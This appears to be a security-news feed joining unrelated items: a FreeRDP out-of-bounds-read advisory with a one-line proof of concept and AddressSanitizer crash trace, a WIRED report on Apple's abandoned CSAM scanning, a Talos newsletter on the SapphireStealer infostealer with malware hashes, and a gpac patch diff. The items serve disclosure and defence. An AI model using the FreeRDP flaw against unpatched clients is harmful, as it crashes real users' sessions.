FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a missing offset validation may lead to an Out Of Bound Read in the function `gdi_multi_opaque_rect`. In particular there is no code to validate if the value `multi_opaque_rect->numRectangles` is less than 45. Looping through `multi_opaque_rect->`numRectangles without proper boundary checks can lead to Out-of-Bounds Read errors which will likely lead to a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.


**Affected versions**

<= 2.10.0 , <= 3.0.0-beta2

**Patched versions**

2.11.0, 3.0.0-beta3

**Summary**

Missing offset validation leading to Out Of Bound Read in gdi_multi_opaque_rect

**Affected**

FreeRDP based clients only. FreeRDP proxy not affected as image decoding is not done by proxy (data passthrough)

**Details**

typedef struct

{

INT32 nLeftRect;

INT32 nTopRect;

INT32 nWidth;

INT32 nHeight;

UINT32 color;

UINT32 numRectangles;

UINT32 cbData;

DELTA\_RECT rectangles\[45\];

} MULTI\_OPAQUE\_RECT\_ORDER;

The size of the rectangles array is 45.

if (!read\_order\_field\_byte(orderInfo, s, 8, &multi\_opaque\_rect\->numRectangles, TRUE))

return FALSE;

There is no code to validate if multi_opaque_rect->numRectangles is less than 45.

https://github.com/FreeRDP/FreeRDP/blob/63a2f65618748c12f79ff7450d46c6e194f2db76/libfreerdp/gdi/gdi.c#L723C1-L758  
Looping through multi_opaque_rect->numRectangles without proper boundary checks can lead to Out-of-Bounds Read errors.

**PoC**

1.  Send packet with multi_opaque_rect->numRectangles >= 45

**Impact**

Out-of-Bounds Read

**Asan**

    ==97916==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200002b7c0 at pc 0x0001013cd838 bp 0x00016fffdc90 sp 0x00016fffdc88
    READ of size 4 at 0x62200002b7c0 thread T4
        #0 0x1013cd834 in gdi_multi_opaque_rect+0x3cc (libfreerdp3.3.0.0.dylib:arm64+0x16d834) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #1 0x10148ff08 in update_recv_primary_order+0x195c (libfreerdp3.3.0.0.dylib:arm64+0x22ff08) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #2 0x10148c974 in update_recv_order+0x1cc (libfreerdp3.3.0.0.dylib:arm64+0x22c974) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #3 0x10154423c in update_recv_orders+0x228 (libfreerdp3.3.0.0.dylib:arm64+0x2e423c) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #4 0x101543a68 in update_recv+0x318 (libfreerdp3.3.0.0.dylib:arm64+0x2e3a68) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #5 0x10150bf28 in rdp_recv_data_pdu+0x998 (libfreerdp3.3.0.0.dylib:arm64+0x2abf28) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #6 0x101516fdc in rdp_recv_tpkt_pdu+0x9d8 (libfreerdp3.3.0.0.dylib:arm64+0x2b6fdc) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #7 0x1015165ac in rdp_recv_pdu+0x34 (libfreerdp3.3.0.0.dylib:arm64+0x2b65ac) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #8 0x101511e14 in rdp_recv_callback_int+0x1408 (libfreerdp3.3.0.0.dylib:arm64+0x2b1e14) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #9 0x10151093c in rdp_recv_callback+0x1d8 (libfreerdp3.3.0.0.dylib:arm64+0x2b093c) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #10 0x101537128 in transport_check_fds+0x51c (libfreerdp3.3.0.0.dylib:arm64+0x2d7128) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #11 0x10151271c in rdp_check_fds+0x170 (libfreerdp3.3.0.0.dylib:arm64+0x2b271c) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #12 0x1014ad4f8 in freerdp_check_fds+0x1ac (libfreerdp3.3.0.0.dylib:arm64+0x24d4f8) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #13 0x1014adbc8 in freerdp_check_event_handles+0x70 (libfreerdp3.3.0.0.dylib:arm64+0x24dbc8) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #14 0x100103700 in mac_client_thread+0x5a4 (MacFreeRDP:arm64+0x13700) (BuildId: 648033a131eb3f0f9702f5da3e9b172432000000200000000100000000000d00)
        #15 0x101dcd4ac in thread_launcher thread.c:520
        #16 0x1a20cbfa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
        #17 0x663d8001a20c6d9c  (<unknown module>)
    
    0x62200002b7c0 is located 0 bytes after 5824-byte region [0x62200002a100,0x62200002b7c0)
    allocated by thread T0 here:
        #0 0x102355964 in wrap_calloc+0x94 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x51964) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
        #1 0x10154f91c in update_new+0x28c (libfreerdp3.3.0.0.dylib:arm64+0x2ef91c) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #2 0x101513124 in rdp_new+0x77c (libfreerdp3.3.0.0.dylib:arm64+0x2b3124) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #3 0x1014aefbc in freerdp_context_new_ex+0x254 (libfreerdp3.3.0.0.dylib:arm64+0x24efbc) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00)
        #4 0x1000f5b28 in freerdp_client_context_new+0x29c (MacFreeRDP:arm64+0x5b28) (BuildId: 648033a131eb3f0f9702f5da3e9b172432000000200000000100000000000d00)
        #5 0x100034514 in -[AppDelegate CreateContext]+0x188 (MacFreeRDP:arm64+0x100008514) (BuildId: c0debf5af29834acb3c97ff2be5d5c4932000000200000000100000000000d00)
        #6 0x100032368 in -[AppDelegate applicationDidFinishLaunching:]+0x118 (MacFreeRDP:arm64+0x100006368) (BuildId: c0debf5af29834acb3c97ff2be5d5c4932000000200000000100000000000d00)
        #7 0x1a219f17c in __CFNOTIFICATIONCENTER_IS_CALLING_OUT_TO_AN_OBSERVER__+0x90 (CoreFoundation:arm64+0x7417c) (BuildId: 203e44018c2e3157a24b92f52551d43e32000000200000000100000000040d00)
        #8 0xbd1e0001a223aee8  (<unknown module>)
        #9 0xec5e8001a223ae30  (<unknown module>)
        #10 0xce4b0001a21704c8  (<unknown module>)
        #11 0x8e370001a30ce8f0  (<unknown module>)
        #12 0x81240001a53d1154  (<unknown module>)
        #13 0xe83a8001a53d0f04  (<unknown module>)
        #14 0x98108001a53cefa0  (<unknown module>)
        #15 0x5b610001a53ceb9c  (<unknown module>)
        #16 0x242a8001a30f8b60  (<unknown module>)
        #17 0x665d8001a30f89c0  (<unknown module>)
        #18 0xd4670001a84d1514  (<unknown module>)
        #19 0x50320001a84d0e40  (<unknown module>)
        #20 0x32390001a84c9f14  (<unknown module>)
        #21 0x643b0001aba02b40  (<unknown module>)
        #22 0x6c490001a53ca044  (<unknown module>)
        #23 0xde3e0001a53c8edc  (<unknown module>)
        #24 0x774c0001a53bd340  (<unknown module>)
        #25 0x2c3b0001a5394790  (<unknown module>)
        #26 0xe25b800100032020  (<unknown module>)
        #27 0x1a1d73f24  (<unknown module>)
        #28 0xb2377ffffffffffc  (<unknown module>)
    
    Thread T4 created by T0 here:
        #0 0x10234e91c in wrap_pthread_create+0x50 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x4a91c) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
        #1 0x101dca52c in winpr_StartThread thread.c:568
        #2 0x101dc9c00 in CreateThread thread.c:650
        #3 0x100102e64 in -[MRDPView rdpStart:]+0x964 (MacFreeRDP:arm64+0x12e64) (BuildId: 648033a131eb3f0f9702f5da3e9b172432000000200000000100000000000d00)
        #4 0x1001022b4 in mfreerdp_client_start+0x488 (MacFreeRDP:arm64+0x122b4) (BuildId: 648033a131eb3f0f9702f5da3e9b172432000000200000000100000000000d00)
        #5 0x1000f618c in freerdp_client_start+0x190 (MacFreeRDP:arm64+0x618c) (BuildId: 648033a131eb3f0f9702f5da3e9b172432000000200000000100000000000d00)
        #6 0x10003278c in -[AppDelegate applicationDidFinishLaunching:]+0x53c (MacFreeRDP:arm64+0x10000678c) (BuildId: c0debf5af29834acb3c97ff2be5d5c4932000000200000000100000000000d00)
        #7 0x1a219f17c in __CFNOTIFICATIONCENTER_IS_CALLING_OUT_TO_AN_OBSERVER__+0x90 (CoreFoundation:arm64+0x7417c) (BuildId: 203e44018c2e3157a24b92f52551d43e32000000200000000100000000040d00)
        #8 0xbd1e0001a223aee8  (<unknown module>)
        #9 0xec5e8001a223ae30  (<unknown module>)
        #10 0xce4b0001a21704c8  (<unknown module>)
        #11 0x8e370001a30ce8f0  (<unknown module>)
        #12 0x81240001a53d1154  (<unknown module>)
        #13 0xe83a8001a53d0f04  (<unknown module>)
        #14 0x98108001a53cefa0  (<unknown module>)
        #15 0x5b610001a53ceb9c  (<unknown module>)
        #16 0x242a8001a30f8b60  (<unknown module>)
        #17 0x665d8001a30f89c0  (<unknown module>)
        #18 0xd4670001a84d1514  (<unknown module>)
        #19 0x50320001a84d0e40  (<unknown module>)
        #20 0x32390001a84c9f14  (<unknown module>)
        #21 0x643b0001aba02b40  (<unknown module>)
        #22 0x6c490001a53ca044  (<unknown module>)
        #23 0xde3e0001a53c8edc  (<unknown module>)
        #24 0x774c0001a53bd340  (<unknown module>)
        #25 0x2c3b0001a5394790  (<unknown module>)
        #26 0xe25b800100032020  (<unknown module>)
        #27 0x1a1d73f24  (<unknown module>)
        #28 0xb2377ffffffffffc  (<unknown module>)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (libfreerdp3.3.0.0.dylib:arm64+0x16d834) (BuildId: a67b59c65b683446b8fc4304a06ccf9b32000000200000000100000000000d00) in gdi_multi_opaque_rect+0x3cc
    Shadow bytes around the buggy address:
      0x62200002b500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x62200002b580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x62200002b600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x62200002b680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x62200002b700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x62200002b780: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
      0x62200002b800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x62200002b880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x62200002b900: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x62200002b980: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x62200002ba00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==97916==ABORTING
    [19:51:10:43] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [fatal_handler]: Caught signal 'Abort trap: 6' [6]
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 0: 0   libwinpr3.3.0.0.dylib               0x0000000101d2b6e4 winpr_execinfo_backtrace + 336
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 1: 1   libwinpr3.3.0.0.dylib               0x0000000101d2521c winpr_backtrace + 24
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 2: 2   libwinpr3.3.0.0.dylib               0x0000000101d25578 winpr_log_backtrace_ex + 304
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 3: 3   libwinpr3.3.0.0.dylib               0x0000000101d2543c winpr_log_backtrace + 44
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 4: 4   libfreerdp3.3.0.0.dylib             0x000000010131e1b8 fatal_handler + 460
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 5: 5   libsystem_platform.dylib            0x00000001a20faa24 _sigtramp + 56
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 6: 6   libsystem_pthread.dylib             0x00000001a20cbc28 pthread_kill + 288
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 7: 7   libsystem_c.dylib                   0x00000001a1fd9ae8 abort + 180
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 8: 8   libclang_rt.asan_osx_dynamic.dylib  0x00000001023789b8 _ZN11__sanitizer6AtexitEPFvvE + 0
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 9: 9   libclang_rt.asan_osx_dynamic.dylib  0x0000000102378124 _ZN11__sanitizer22SetCheckUnwindCallbackEPFvvE + 0
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 10: 10  libclang_rt.asan_osx_dynamic.dylib  0x000000010235d658 _ZN6__asan16ErrorDescription5PrintEv + 0
    [19:51:10:47] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 11: 11  libclang_rt.asan_osx_dynamic.dylib  0x000000010235c99c _ZN6__asan18ReportGenericErrorEmmmmbmjb + 1452
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 12: 12  libclang_rt.asan_osx_dynamic.dylib  0x000000010235dba0 __asan_report_load4 + 52
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 13: 13  libfreerdp3.3.0.0.dylib             0x00000001013cd838 gdi_multi_opaque_rect + 976
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 14: 14  libfreerdp3.3.0.0.dylib             0x000000010148ff0c update_recv_primary_order + 6496
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 15: 15  libfreerdp3.3.0.0.dylib             0x000000010148c978 update_recv_order + 464
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 16: 16  libfreerdp3.3.0.0.dylib             0x0000000101544240 update_recv_orders + 556
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 17: 17  libfreerdp3.3.0.0.dylib             0x0000000101543a6c update_recv + 796
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 18: 18  libfreerdp3.3.0.0.dylib             0x000000010150bf2c rdp_recv_data_pdu + 2460
    [19:51:10:48] [97916:6ffff000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 19: 19  libfreerdp3.3.0.0.dylib             0x0000000101516fe0 rdp_recv_tpkt_pdu + 2524

CVE-2023-39356: Missing offset validation leading to Out-of-Bounds Read in gdi_multi_opaque_rect

Child safety group Heat Initiative plans to launch a campaign pressing Apple on child sexual abuse material scanning and user reporting. The company issued a rare, detailed response on Thursday.

In December, Apple said that it was killing an effort to design a privacy-preserving iCloud photo-scanning tool for detecting child sexual abuse material (CSAM) on the platform. Originally announced in August 2021, the project had been controversial since its inception. Apple had first paused it that September in response to concerns from digital rights groups and researchers that such a tool would inevitably be abused and exploited to compromise the privacy and security of all iCloud users. This week, a new child safety group known as Heat Initiative told Apple that it is organizing a campaign to demand that the company “detect, report, and remove” child sexual abuse material from iCloud and offer more tools for users to report CSAM to the company. 

Today, in a rare move, Apple responded to Heat Initiative, outlining its reasons for abandoning the development of its iCloud CSAM scanning feature and instead focusing on a set of on-device tools and resources for users known collectively as Communication Safety features. The company's response to Heat Initiative, which Apple shared with WIRED this morning, offers a rare look not just at its rationale for pivoting to Communication Safety, but at its broader views on creating mechanisms to circumvent user privacy protections, such as encryption, to monitor data. This stance is relevant to the encryption debate more broadly, especially as countries like the United Kingdom weigh passing laws that would require tech companies to be able to access user data to comply with law enforcement requests.

“Child sexual abuse material is abhorrent and we are committed to breaking the chain of coercion and influence that makes children susceptible to it,” Erik Neuenschwander, Apple's director of user privacy and child safety, wrote in the company's response to Heat Initiative. He added, though, that after collaborating with an array of privacy and security researchers, digital rights groups, and child safety advocates, the company concluded that it could not proceed with development of a CSAM-scanning mechanism, even one built specifically to preserve privacy.

“Scanning every user’s privately stored iCloud data would create new threat vectors for data thieves to find and exploit," Neuenschwander wrote. "It would also inject the potential for a slippery slope of unintended consequences. Scanning for one type of content, for instance, opens the door for bulk surveillance and could create a desire to search other encrypted messaging systems across content types.”

WIRED could not immediately reach Heat Initiative for comment about Apple's response. The group is led by Sarah Gardner, former vice president of external affairs for the nonprofit Thorn, which works to use new technologies to combat child exploitation online and sex trafficking. In 2021, Thorn lauded Apple's plan to develop an iCloud CSAM scanning feature. Gardner said in an email to CEO Tim Cook on Wednesday, August 30, which Apple also shared with WIRED, that Heat Initiative found Apple's decision to kill the feature “disappointing.”

“We firmly believe that the solution you unveiled not only positioned Apple as a global leader in user privacy but also promised to eradicate millions of child sexual abuse images and videos from iCloud,” Gardner wrote to Cook. “I am a part of a developing initiative involving concerned child safety experts and advocates who intend to engage with you and your company, Apple, on your continued delay in implementing critical technology … Child sexual abuse is a difficult issue that no one wants to talk about, which is why it gets silenced and left behind. We are here to make sure that doesn’t happen.”

Apple maintains that, ultimately, even its own well-intentioned design could not be adequately safeguarded in practice, and that on-device nudity detections for features like Messages, FaceTime, AirDrop, and the Photo picker are safer alternatives. Apple has also begun offering an application programming interface (API) for its Communication Safety features so third-party developers can incorporate them into their apps. Apple says that the communication platform Discord is integrating the features and that appmakers broadly have been enthusiastic about adopting them.

“We decided to not proceed with the proposal for a hybrid client-server approach to CSAM detection for iCloud Photos from a few years ago,” Neuenschwander wrote to Heat Initiative. “We concluded it was not practically possible to implement without ultimately imperiling the security and privacy of our users.”

On Heat Initiative's request that Apple create a CSAM reporting mechanism for users, the company told WIRED that its focus is on connecting its vulnerable or victimized users directly with local resources and law enforcement in their region that can assist them rather than Apple positioning itself as an intermediary for processing reports. The company says that offering this intermediary service may make sense for interactive platforms like social networks.

The need to protect children from online sexual abuse is urgent, though, and as these concerns intersect with the broader encryption debate, Apple's resolve on refusing to implement data scanning will continue to be tested.

Read the full exchange between Heat Initiative and Apple below. WIRED has redacted sensitive personal information for the privacy of senders and recipients:

Apple's Decision to Kill Its CSAM Photo-Scanning Tool Sparks Fresh Controversy

A new open-source information stealer called ‘SapphireStealer’ has been observed across public malware repositories with increasing frequency. Plus, watch a new series of videos on the year so far in the threat landscape.

Thursday, August 31, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I’m covering for Jon this week whilst he takes some well-deserved holiday. What’s on my mind this week? Well, apart from a new horror film that I just read about called “Slotherhouse” where the killer is, um, a sloth (I predict nothing but a masterpiece), there are a couple of things on my mind relating to open-source.

Firstly, on the bad actor side of things, we’re seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which you can read about below.

When I spoke to Cisco Talos’ Head of Outreach, Nick Biasini, about the biggest trends 2023 so far, he called out how attackers are increasingly using malicious open-source tooling. This has been a large part of the reason we are seeing a continuous fracturing of the ransomware and extortion landscape, as threat actors find what they need online, and then adapt these tools to suit their needs, and in many cases add on anti-detection mechanisms.

Speaking of 2023 trends, I just uploaded a new playlist of 1–2-minute long videos featuring Nick’s thoughts and explanations on some of the biggest threats we’ve seen so far this year - including the evolution of ransomware, the rise in commercial spyware, and supply chain attacks. Check out the playlist. As a preview, here's Nick talking about the evolution of ransomware in 2023:

On the flip side, open-source is of course one of the most important ways in which security defenders can learn, upskill, and share their findings with the community. That’s one of the reasons why Talos creates and releases open-source software, for free.

Just in case you don’t know about our open-source tools, which have been developed by some of the smartest brains on the planet, you should check them out. We have around 27 tools which are available to download on our website at talosintelligence.com/software and on GitHub. The latest and greatest of these is the NIM-IDA-FLIRT Generator tool.

Oh, I just read that “Slotherhouse” will not only feature a killer sloth, it’s called Alpha, and their weapon of choice is a samurai sword. One ticket please.

****The one big thing****

SapphireStealer, an open-source information stealer, has been increasingly observed across public malware repositories since its initial release in December 2022. SapphireStealer is an example of a new type of information stealer, which is mostly designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information.

While infostealers have been around for a very long time, Talos has recently seen an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces.

**Why do I care?**

As is often the case following the release of a new open-source malware codebase, threat actors have acted quickly, and began to experiment. Some threat actors have even extended SaphireStealer to support added functionality, and used other tooling to make the detection of SapphireStealer infections more difficult (again, another increasing trend that we’re seeing across the threat landscape). Infostealers remain a popular choice for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information to adversaries.

**So now what?**

A comprehensive blog written by Edmund Brumaghin covers the background behind SapphireStealer, and our research on the tool, including a case study where we saw multiple failures on the part of the threat actor to maintain sound operational security. The blog includes Snort SIDs, and indicators of compromise.

****Top security headlines of the week****

*   **Operation “Duck Hunt" proactively removes Qakbot malware from 700,000 infected machines.** In one of the largest operations of its kind, federal law enforcement took decisive action against one of the most widely used and longstanding botnets. According to the U.S Department of Justice, these efforts resulted in Qakbot being “neutralized” from hundreds of thousands of devices. According to TechCrunch, “The Department of Justice also announced the seizure of more than $8.6 million in cryptocurrency from the Qakbot cybercriminal organization, which will now be made available to victims”. Dark Reading TechCrunch
*   **What’s in a name? Strange behaviors at top-level domains creates uncertainty in DNS.** When Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, it ignited a firestorm of controversy as security organizations warned against the confusion that was certain to occur. Talos researcher Jaeson Schultz recently wrote about the consequences of Google’s decsion, including how, in the worst case scenario, confusion over whether some name is a public DNS name, or another private resource can cause sensitive data to fall into the hands of unintended recipients. Talos blog.
*   **OpenAI rolls out a business edition of ChatGPT, promising “enterprise-grade security”**. OpenAI says it is making a commitment not to use client-specific prompts and data in the training of its models. SecurityWeek writes that “the security-centric features of the new ChatGPT Enterprise are meant to address ongoing business concerns about the protection of intellectual property and the integrity of sensitive corporate data when using LLM (large language model) algorithms.” SecurityWeek

****Can’t get enough Talos?****

*   Beers with Talos Ep. #138  “I’m going to breach you off.” “Not if I breach you off first!” (Where Barbie meets offensive security)
*   Talos Takes Ep. #152 Carrying out incident response in-person vs. virtually (hear about the positives and negatives of each approach)
*   Blog: Black Hat USA 2023 NOC: Network Assurance (a great write up about how Cisco and Talos helped to protect the network during Black Hat USA 2023).
*   Security Stories Ep. #69 Preparing for a cybersecurity incident, with Jeremy Maxwell (hear from a Cisco Talos Incident Response customer about how his organization proactively prepares for cybersecurity incidents within a highly regulated industry.

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

_Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

_Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

_Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

****Most prevalent malware files from Talos telemetry over the past week****

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6

MD5: 4c9a8e82a41a41323d941391767f63f7

VirusTotal: https://www.virustotal.com/gui/file/1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6/details

Typical Filename: !!Mreader.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Generic::sheath

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b

MD5: f5e908f1fac5f98ec63e3ec355ef6279

VirusTotal: https://www.virustotal.com/gui/file/7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b/details

Typical Filename: IMG001.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Coinminer::tpd

New open-source infostealer, and reflections on 2023 so far

NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.3-DEV.

Expand Up

@@ -1948,8 +1948,11 @@ int avi\_parse\_input\_file(avi\_t \*AVI, int getIndex)

  

header\_offset \= gf\_ftell(AVI\->fdes);

  

if( avi\_read(AVI\->fdes,(char \*)hdrl\_data, (u32) n) != n ) ERR\_EXIT(AVI\_ERR\_READ)

if( avi\_read(AVI\->fdes,(char \*)hdrl\_data, (u32) n) != n ) {

if (hdrl\_data) gf\_free(hdrl\_data);

ERR\_EXIT(AVI\_ERR\_READ)

}

}

else if(strnicmp(data,"movi",4) \== 0)

{

AVI\->movi\_start \= gf\_ftell(AVI\->fdes);

Expand All

@@ -1964,19 +1967,24 @@ int avi\_parse\_input\_file(avi\_t \*AVI, int getIndex)

  

AVI\->n\_idx \= AVI\->max\_idx \= (u32) (n/16);

AVI\->idx \= (unsigned char((\*)\[16\]) ) gf\_malloc((u32)n);

if(AVI\->idx\==0) ERR\_EXIT(AVI\_ERR\_NO\_MEM)

if(avi\_read(AVI\->fdes, (char \*) AVI\->idx, (u32) n) != n ) {

gf\_free( AVI\->idx);

AVI\->idx\=NULL;

AVI\->n\_idx \= 0;

}

if(AVI\->idx\==0) {

if (hdrl\_data) gf\_free(hdrl\_data);

ERR\_EXIT(AVI\_ERR\_NO\_MEM)

}

if(avi\_read(AVI\->fdes, (char \*) AVI\->idx, (u32) n) != n ) {

gf\_free( AVI\->idx);

AVI\->idx\=NULL;

AVI\->n\_idx \= 0;

if (hdrl\_data) gf\_free(hdrl\_data);

ERR\_EXIT(AVI\_ERR\_READ)

}

}

else

gf\_fseek(AVI\->fdes,n,SEEK\_CUR);

}

  

if(!hdrl\_data ) ERR\_EXIT(AVI\_ERR\_NO\_HDRL)

if(!AVI\->movi\_start) ERR\_EXIT(AVI\_ERR\_NO\_MOVI)

if(!hdrl\_data) ERR\_EXIT(AVI\_ERR\_NO\_HDRL)

if(!AVI\->movi\_start) ERR\_EXIT(AVI\_ERR\_NO\_MOVI)

  

/\* Interpret the header list \*/

  

Expand Down

CVE-2023-4681: fixed #2575 · gpac/gpac@4bac19a

Divide By Zero in GitHub repository gpac/gpac prior to 2.3-DEV.

CVE-2023-4678

CVE-2023-4683

Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV.

CVE-2023-4682

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Schweitzer Engineering Laboratories SEL-5036 acSELerator Bay Screen Builder Software on Windows allows Relative Path Traversal.



